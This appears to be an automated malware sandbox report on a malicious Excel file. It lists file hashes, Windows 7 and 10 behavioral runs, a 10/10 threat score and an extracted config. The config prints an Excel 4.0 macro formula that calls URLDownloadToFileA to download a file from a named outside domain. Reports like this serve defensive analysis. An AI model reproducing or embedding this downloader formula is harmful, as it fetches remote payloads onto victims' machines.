General
-
Target
document-630335192.xls
-
Size
39KB
-
Sample
210311-ahmk6ek8ts
-
MD5
7f32e36c3a4ab9b3c2cb70cdd7232a97
-
SHA1
19a8b5279606ef888421ed4482f4222a184b6313
-
SHA256
64d8b1c5f101aca6c0f3e6b31e12bc2acef52ae9ab490b07ed5e228ed43aefd0
-
SHA512
98ee0d78a0ed8ba81a5b9bce1a4745d99d9351ddc3eee6be76f5f3386cffe07bbb30a6e65a1e7cad6b5fdc47af21fd7a88fe4bbcae0e7c0667cfd3d65f63f002
Behavioral task
behavioral1
Sample
document-630335192.xls
Resource
win7v20201028
Behavioral task
behavioral2
Sample
document-630335192.xls
Resource
win10v20201028
Malware Config
Extracted
http://dzw10jpcgj03fckc.com/inda.xls
-
formulas
=CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://dzw10jpcgj03fckc.com/inda.xls","..\fkruf.djr",0)
Extracted
http://dzw10jpcgj03fckc.com/inda.xls
Targets
-
-
Target
document-630335192.xls
-
Size
39KB
-
MD5
7f32e36c3a4ab9b3c2cb70cdd7232a97
-
SHA1
19a8b5279606ef888421ed4482f4222a184b6313
-
SHA256
64d8b1c5f101aca6c0f3e6b31e12bc2acef52ae9ab490b07ed5e228ed43aefd0
-
SHA512
98ee0d78a0ed8ba81a5b9bce1a4745d99d9351ddc3eee6be76f5f3386cffe07bbb30a6e65a1e7cad6b5fdc47af21fd7a88fe4bbcae0e7c0667cfd3d65f63f002
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-